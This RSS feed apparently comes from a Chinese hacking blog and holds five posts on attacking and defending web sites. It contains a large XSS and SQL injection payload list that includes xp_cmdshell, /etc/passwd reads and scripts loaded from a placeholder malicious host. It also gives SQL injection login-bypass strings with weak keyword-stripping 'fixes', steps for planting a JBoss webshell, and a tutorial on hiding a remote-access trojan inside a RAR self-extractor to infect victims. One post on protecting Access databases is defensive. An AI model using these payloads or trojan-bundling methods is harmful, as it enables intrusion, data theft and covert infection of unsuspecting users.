<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[Heck's  Blog]]></title> 
<link>https://www.heckjj.com/index.php</link> 
<description><![CDATA[一瞬间的决定，往往可以改变很多，事实上，让自己成功的往往不是知识，是精神！ 如果你总是为自己找借口，那只好让成功推迟。执行力，今天！]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[Heck's  Blog]]></copyright>
<item>
<link>https://www.heckjj.com/resolve-the-or-equals-or-sqlinject-html/</link>
<title><![CDATA[or = or 网站万能密码漏洞修补和总结]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Tue, 18 Jan 2011 07:20:35 +0000</pubDate> 
<guid>https://www.heckjj.com/resolve-the-or-equals-or-sqlinject-html/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style="font-family: 微软雅黑;">咱们提起这个万能密码，我相信玩过黑的都非常熟悉吧，也就是&#039;or&#039; = &#039;or&#039;属于很老的漏洞，这只最基础的一种，最近我看见很多网站有这种bug，最近有个辽宁沈阳的小伙在google搜索关键词“332003231 后台”貌似想黑哥我一把。下面我来总结一下吧:<br/><br/>1：语句:&#039;&#039;or&#039;=&#039;or&#039; a&#039;or&#039;1=1-- &#039;or1=1-- &quot;or1=1-- or1=1-- &#039;or&quot;=&quot;a&#039;=&#039;a &#039;) or (&#039;a&#039;=&#039;a等等。。。<br/>&lt;%<br/>(1)pwd = request.form(&quot;pwd&quot;) &quot;获取客户端输入的密码,再把值赋给pwd&quot;<br/>(2)name = request.form(&quot;name&quot;) &quot;获取客户端输入的用户名再把值赋给name&quot;<br/>都没有进行任何过滤<br/>(3)Set rs = Server.CreateObject(&quot;ADODB.Connection&quot;) &quot;利用Server对象的CreateObject方法创建ADO组件的Connection对象&quot;<br/>(4)sql = &quot;select * from Manage_User where UserName=&#039;&quot; &amp; name &amp; &quot;&#039; And PassWord=&#039;&quot;&amp;encrypt(pwd)&amp;&quot;&#039;&quot; &quot;将用户名和密码放入查询语句中查询数据库&quot;<br/>(5)Set rs = conn.Execute(sql) &quot;执行SQL语句&quot;<br/> <br/>(6)If Not rs.EOF = True Then &quot;当前的记录位于Connection对象的最记录之后一个前&quot;<br/>(7)Session(&quot;Name&quot;) = rs(&quot;UserName&quot;) &quot;将UserName的属性赋给Name的Session自定义变量&quot;<br/>(8)Session(&quot;pwd&quot;) = rs(&quot;PassWord&quot;) &quot;将PassWord的属性赋给pwd的Session自定义变量&quot;<br/>(9)Response.Redirect(&quot;Manage.asp&quot;)了 &quot;利用Response对象的Redirect方法重定向&quot;Manage.asp&quot;<br/>(10)Else<br/>(11)Response.Redirect &quot;chklogin.asp?msg=您输入了错误的帐号或口令，请再次输入！&quot;<br/>(12)End If<br/>(13)end if<br/>%&gt;</span><span style="font-family: 微软雅黑;"><br/>这是很明显有漏洞的login.asp的代码.<br/>直接从这两句就可以看出来..<br/>(1)pwd = request.form(&quot;pwd&quot;) &quot;获取客户端输入的密码,再把值赋给pwd&quot;<br/>(2)name = request.form(&quot;name&quot;) &quot;获取客户端输入的用户名再把值赋给name&quot;<br/>没有进行任何的过滤..<br/>网上流传着这么一个代码说是很好的防范的..<br/>name=replace(request.form(&quot;name&quot;) ,&quot;&#039;&quot;,&quot;&quot;) <br/>pass=replace(request.form(&quot;pass&quot;) ,&quot;&#039;&quot;,&quot;&quot;)<br/>可是一旦用上了此代码 就发现了问题了.<br/>过滤掉了&#039;号之后管理员的密码和名称就不能用这样的符号了，那怎么办呢？看我这个方法..<br/>嘿嘿。<br/>pwd = request.form(&quot;pwd&quot;)<br/>name = request.form(&quot;name&quot;)<br/>if (name&lt;&gt;&quot;&quot;) and (Pwd&lt;&gt;&quot;&quot;) then &#039;判断数据为非空<br/>name=Replace(Replace(name,&quot;&#039;&quot;,&quot;&quot;),&quot;or&quot;,&quot;&quot;) &#039;嵌套了两个replace函数，过滤特殊字符<br/>Pwd=Replace(Replace(Pwd,&quot;&#039;&quot;,&quot;&quot;),&quot;or&quot;,&quot;&quot;)<br/><br/>当然还有一种办法是定义一个检查输入的方法，然后登陆时调用这个方法：<br/>&lt;%<br/>Function ChkStr(istr)<br/>dim Sql_Kill,Sql_Kill_2,Sql_Kill_3<br/>Sql_Kill = &quot;&#92;&#039;&#124;and&#124;or&#124;exec&#124;insert&#124;select&#124;delete&#124;update&#124;count&#124;*&#124;%&#124;chr&#124;mid&#124;master&#124;truncate&#124;char&#124;declare&#124;set&#124;;&#124;from&#124;=&quot;<br/>Sql_Kill_2 = split(Sql_Kill,&quot;&#124;&quot;)<br/>for Each Sql_Kill_3 In Sql_Kill_2<br/>istr=Replace(istr,Sql_Kill_3,&quot;&quot;)<br/>Next<br/>ChkStr=istr<br/>End Function<br/>%&gt;<br/>上面的方法也是就是将比如&quot;or&quot;这些关键词给替换成空格。</span><br/>Tags - <a href="https://www.heckjj.com/tags/sql%25E6%25B3%25A8%25E5%2585%25A5/" rel="tag">sql注入</a>
]]>
</description>
</item><item>
<link>https://www.heckjj.com/cross-site-script-bug-safe-test-html/</link>
<title><![CDATA[xss 跨站脚本漏洞安全测试]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Mon, 25 Oct 2010 11:53:25 +0000</pubDate> 
<guid>https://www.heckjj.com/cross-site-script-bug-safe-test-html/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style="font-family: 微软雅黑;">很多网站存在xss 跨站脚本漏洞，下面的安全测试测用例还是挺管用的，能够查找和发现潜在的bug，大家可以试试看吧。&nbsp;&nbsp;<br/>　&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　=&#039;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　&lt;script&gt;alert(vulnerable)&lt;/script&gt;<br/>　　%3Cscript%3Ealert(&#039;XSS&#039;)%3C/script%3E<br/>　　&lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;<br/>　　&lt;img src=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　%0a%0a&lt;script&gt;alert(&#92;&quot;Vulnerable&#92;&quot;)&lt;/script&gt;.jsp<br/>　　%22%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br/>　　%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini<br/>　　%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html<br/>　　&lt;script&gt;alert(&#039;Vulnerable&#039;);&lt;/script&gt;<br/>　　&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt; </span><span style="font-family: 微软雅黑;"><br/>　　?sql_debug=1<br/>　　a%5c.aspx<br/>　　a.jsp/&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　a?&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　&quot;&gt;&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　&#039;;exec%20master..xp_cmdshell%20&#039;dir%20 c:%20&gt;%20c:&#92;inetpub&#92;wwwroot&#92;?.txt&#039;--&amp;&amp;<br/>　　%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br/>　　%3Cscript%3Ealert(document. domain);%3C/script%3E&amp;<br/>　　 %3Cscript%3Ealert(document.domain);%3C/script%3E&amp;SESSION_ID=&#123;SESSION_ID&#125;&amp;SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=<br/>　　../../../../../../../../etc/passwd<br/>　　..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;windows&#92;system.ini<br/>　　&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;windows&#92;system.ini<br/>　　&#039;&#039;;!--&quot;&lt;XSS&gt;=&amp;&#123;()&#125;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=JaVaScRiPt:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&quot;&lt;IMG SRC=java&#92;0script:alert(&#92;&quot;XSS&#92;&quot;)&gt;&quot;;&#039; &gt; out<br/>　　&lt;IMG SRC=&quot; javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;<br/>　　&lt;BODY BACKGROUND=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;BODY ONLOAD=alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG DYNSRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;IMG LOWSRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;BGSOUND SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;br size=&quot;&amp;&#123;alert(&#039;XSS&#039;)&#125;&quot;&gt;<br/>　　&lt;LAYER SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/layer&gt;<br/>　　&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IMG SRC=&#039;vbscript:msgbox(&quot;XSS&quot;)&#039;&gt;<br/>　　&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;<br/>　　&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;<br/>　　&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IFRAME SRC=javascript:alert(&#039;XSS&#039;)&gt;&lt;/IFRAME&gt;<br/>　　&lt;FRAMESET&gt;&lt;FRAME SRC=javascript:alert(&#039;XSS&#039;)&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;<br/>　　&lt;TABLE BACKGROUND=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&#039;XSS&#039;))&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;behaviour: url(&#039;http://恶意网址/exploit.html&#039;);&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;width: expression(alert(&#039;XSS&#039;));&quot;&gt;<br/>　　&lt;STYLE&gt;@im&#92;port&#039;&#92;ja&#92;vasc&#92;ript:alert(&quot;XSS&quot;)&#039;;&lt;/STYLE&gt;<br/>　　&lt;IMG STYLE=&#039;x ss:expre&#92;ssion(alert(&quot;XSS&quot;))&#039;&gt;<br/>　　&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&#039;XSS&#039;);&lt;/STYLE&gt;<br/>　　&lt;STYLE TYPE=&quot;text/css&quot;&gt;.XSS&#123;background-image:url(&quot;javascript:alert(&#039;XSS&#039;)&quot;);&#125;&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;<br/>　　&lt;STYLE type=&quot;text/css&quot;&gt;BODY&#123;background:url(&quot;javascript:alert(&#039;XSS&#039;)&quot;)&#125;&lt;/STYLE&gt;<br/>　　&lt;BASE HREF=&quot;javascript:alert(&#039;XSS&#039;);//&quot;&gt;<br/>　　getURL(&quot;javascript:alert(&#039;XSS&#039;)&quot;)<br/>　　a=&quot;get&quot;;b=&quot;URL&quot;;c=&quot;javascript:&quot;;d=&quot;alert(&#039;XSS&#039;);&quot;;eval(a+b+c+d);<br/>　　&lt;XML SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&quot;&gt; &lt;BODY ONLOAD=&quot;a();&quot;&gt;&lt;SCRIPT&gt;function a()&#123;alert(&#039;XSS&#039;);&#125;&lt;/SCRIPT&gt;&lt;&quot;<br/>　　&lt;SCRIPT SRC=&quot;http://恶意网址/x ss.jpg&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;<br/>　　&lt;!--#exec cmd=&quot;/bin/echo &#039;&lt;SCRIPT SRC&#039;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &#039;=http://恶意网址/a.js&gt;&lt;/SCRIPT&gt;&#039;&quot;--&gt;<br/>　　&lt;IMG SRC=&quot;http://恶意网址/somecommand.php?somevariables=maliciouscode&quot;&gt;<br/>　　&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT =&quot;&gt;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT a=&quot;&gt;&quot; &#039;&#039; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT &quot;a=&#039;&gt;&#039;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;A HREF=http://恶意网址/&gt;link&lt;/A&gt;<br/>　　admin&#039;--<br/>　　&#039; or 0=0 --<br/>　　&quot; or 0=0 --<br/>　　or 0=0 --<br/>　　&#039; or 0=0 #<br/>　　&quot; or 0=0 #<br/>　　or 0=0 #<br/>　　&#039; or &#039;x&#039;=&#039;x<br/>　　&quot; or &quot;x&quot;=&quot;x<br/>　　&#039;) or (&#039;x&#039;=&#039;x<br/>　　&#039; or 1=1--<br/>　　&quot; or 1=1--<br/>　　or 1=1--<br/>　　&#039; or a=a--<br/>　　&quot; or &quot;a&quot;=&quot;a<br/>　　&#039;) or (&#039;a&#039;=&#039;a<br/>　　&quot;) or (&quot;a&quot;=&quot;a<br/>　　hi&quot; or &quot;a&quot;=&quot;a<br/>　　hi&quot; or 1=1 --<br/>　　hi&#039; or 1=1 --<br/>　　hi&#039; or &#039;a&#039;=&#039;a<br/>　　hi&#039;) or (&#039;a&#039;=&#039;a<br/>　　hi&quot;) or (&quot;a&quot;=&quot;aXSS测试语法&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br/>Tags - <a href="https://www.heckjj.com/tags/xss/" rel="tag">xss</a> , <a href="https://www.heckjj.com/tags/css/" rel="tag">css</a> , <a href="https://www.heckjj.com/tags/%25E8%25B7%25A8%25E7%25AB%2599%25E8%2584%259A%25E6%259C%25AC%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">跨站脚本漏洞</a> , <a href="https://www.heckjj.com/tags/%25E5%25AE%2589%25E5%2585%25A8%25E6%25B5%258B%25E8%25AF%2595/" rel="tag">安全测试</a>
]]>
</description>
</item><item>
<link>https://www.heckjj.com/access-db-to-avoid-download/</link>
<title><![CDATA[ACCESS数据库防下载安全]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Sun, 26 Sep 2010 00:37:54 +0000</pubDate> 
<guid>https://www.heckjj.com/access-db-to-avoid-download/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="font-family: 微软雅黑;">以前有写过一篇关于access安全的文章，但总觉得有不足，经过测试研究后，重新写出来，欢迎大家进行讨论。 <br/>首先我们知道常见的傻瓜式入侵ASP网站下载默认数据库是其中一个方法，挖掘机挖掘大量的网站，寻找网站中存在的默认数据库。数据库作为一个动态网站最重要的核心，里面记录了大量信息。作为一名入侵者，拿到数据库就等于拿到网站的权限了，轻则泄露数据，重则影响网站乃至整个服务器的安全。 <br/><br/>ASP ACCESS的网站结构是网上最流行的架构方式之一，几乎的站长使用的都是别人的网站系统，很多人都忽略了修改默认数据库，从而导致入侵者有入侵的机会。 <br/><br/>在入侵ASP ACCESS网站系统中，直接下载数据库、使用一句话木马是最常见的方法，其中直接下载数据库包括了通过暴库和直接下载默认数据库来得到数据库路径，插入一句话木马是针对得到数据库地址，并且是ASP或者ASA为扩展名的数据库。 <br/><br/>所以网上流传的修改数据库扩展名为ASP和ASA不是一个最安全的方法，反而被入侵者知道路径后，是一个致命的错。而将数据库名加上#也并非安全的做法。 </span><span style="font-family: 微软雅黑;"><br/><br/>通过上面总结后我们知道，只要让入侵者无法下载数据库，无法插入一句话木马，即使他们知道路径也无妨。 <br/><br/>经过测试，我发现，只要将数据库的扩展名删除，就可以做到了。大家都知道IIS里有个默认文档，当用户浏览网站主页或者网站目录时，首先浏览的就是这默认文档，一般为index.htm、index.asp等等。如果删除了扩展名，那么直接提交数据库地址时，就会被误认为浏览目录，但这个目录并非存在，所以404错误，返回找不到该页。举例：假设我们取数据库名为&quot;hoversnow&quot;（没有扩展名），然后通过访问地址http://**/hoversnow，假设默认文档最前面的一个是index.htm，在访问时会被解析为http://**/hoversnow/index.htm，因为此目录不存在而找不到（测试环境是Windows XP/2003，IIS 5.0/6.0，FAT32/NTFS的硬盘）。但是我在本地测试时，一样可以下载（本地环境是XP和IIS5.0），而上传到空间里测试，却无法下载（空间环境是2003和IIS6.0），于是我想，把文件名里加一个“/”，让他解析成目录，但是文件名中不能含有“/”，所以我把“/”转成了ASCII编码&amp;#47;，经过测试，返回404错误且网站能正常访问（数据库没有连接错误）。 <br/><br/>本文有不足之处欢迎讨论。 </span><br/>Tags - <a href="https://www.heckjj.com/tags/access/" rel="tag">access</a> , <a href="https://www.heckjj.com/tags/%25E6%2595%25B0%25E6%258D%25AE%25E5%25BA%2593/" rel="tag">数据库</a> , <a href="https://www.heckjj.com/tags/%25E9%2598%25B2%25E4%25B8%258B%25E8%25BD%25BD/" rel="tag">防下载</a>
]]>
</description>
</item><item>
<link>https://www.heckjj.com/jboss-server-bug-html/</link>
<title><![CDATA[jboss远程执行代码漏洞]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Wed, 01 Sep 2010 15:06:19 +0000</pubDate> 
<guid>https://www.heckjj.com/jboss-server-bug-html/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="font-family: 微软雅黑;">在JBOSS默认配置下会有一个后台漏洞，漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台，如下图<br/><a href="https://www.heckjj.com/attachment.php?fid=28" target="_blank"><img src="https://www.heckjj.com/attachment.php?fid=28" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a></span><span style="font-family: 微软雅黑;"><br/>下拉找到如下图所示<br/><a href="https://www.heckjj.com/attachment.php?fid=29" target="_blank"><img src="https://www.heckjj.com/attachment.php?fid=29" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>点击flavor=URL,type=DeploymentScanner进入<br/><a href="https://www.heckjj.com/attachment.php?fid=31" target="_blank"><img src="https://www.heckjj.com/attachment.php?fid=31" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>在输入框中写入war压缩文件webshell的url地址，如上图<br/>点击invoke执行界面获得一个jsp的webshell，如下图</span><br/><a href="https://www.heckjj.com/attachment.php?fid=30" target="_blank"><img src="https://www.heckjj.com/attachment.php?fid=30" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>Tags - <a href="https://www.heckjj.com/tags/jboss/" rel="tag">jboss</a> , <a href="https://www.heckjj.com/tags/%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">漏洞</a> , <a href="https://www.heckjj.com/tags/bug/" rel="tag">bug</a>
]]>
</description>
</item><item>
<link>https://www.heckjj.com/post/46/</link>
<title><![CDATA[ rar高级木马捆绑技术动画教程]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Sat, 16 May 2009 07:33:01 +0000</pubDate> 
<guid>https://www.heckjj.com/post/46/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="font-family: 微软雅黑;">大家好，<strong><span style="color: #FF4500;">我叫汏，壊豬~，也叫汏，壊蛋~.当然啦有很多朋友也叫我猪头。嘿嘿</span></strong><br/>可能是太猪了吧。呵呵，谁叫俺是猪头呢。<br/>今天我来给大家讲下rar压缩文件的高级捆绑技术也就是说<br/>我们要利用winrar创建自解压文件然后在里面捆绑我们的木马。<br/><br/>这个鸽子配制就不用我再说了吧。还不会鸽子配制的朋友请去看下相关的教程，本教程只说rar高级捆绑技术<br/><br/>好了，木马生好了。开始捆绑，我要捆绑这个流量精灵。<br/><br/>首先第一种方法是用VBS脚本来弄，看我演示</span><span style="font-family: 微软雅黑;"><br/><br/>这个VBS文件里写的就是执行这木马文件和流量精灵这个工具。我们不能直接把木马发给人家是吧。要么人家双击没反应以为是干嘛呢。<br/>所以这里就捆个。<br/><br/>这里就用第一种方法捆好。看啊。鸽子上线么。=下啊。<br/>嘿嘿上了吧。这是我的机子上了。呵呵。好开始第二种方法<br/>直接执行捆绑文件和木马看好了啊。<br/><br/>第二种也捆好了。来我们看上线么。呵呵，上了吧。<br/>其实很简单的。<br/><br/>首先我们要准备好以下几个东西<br/><br/><br/>1、c32asm<br/><br/>2、远程控制软件，这里我用的是灰鸽子<br/><br/>3、被捆绑的软件(这里我用的是灰鸽子生成的服务端木马)<br/><br/>你看这样子用winrar能打开看得到。所以我们要想办法把这个右键菜单中的用winrar打开去掉。来，看我弄。<br/><br/>用c32asm打开自解压以十六进制的形式打开然后<br/>搜索十六进制807A0161，把61改成其它数值,这里我改了22<br/><br/>再搜索十六进制526172211A07，把61改成之前改的值,改成上面的22<br/><br/>好了看下可以么.嘿嘿。右键中的那个用winrar项没有了吧。好教程到这。<br/>谢谢大家。有问题加我QQ：332003231，大家有兴趣的话可以关注我的blog，另本人不收徒。<br/>教程下载地址：<br/><a href="http://img.namipan.com/downfile/921b198113b89894c15619364e145a7fe2653564047cad00/rar%E6%9C%A8%E9%A9%AC%E9%AB%98%E7%BA%A7%E6%8D%86%E7%BB%91%E6%8A%80%E6%9C%AF.rar">点击这里下载文件</a></span><br/>Tags - <a href="https://www.heckjj.com/tags/rar%25E9%25AB%2598%25E7%25BA%25A7%25E6%259C%25A8%25E9%25A9%25AC%25E6%258D%2586%25E7%25BB%2591/" rel="tag">rar高级木马捆绑</a>
]]>
</description>
</item>
</channel>
</rss>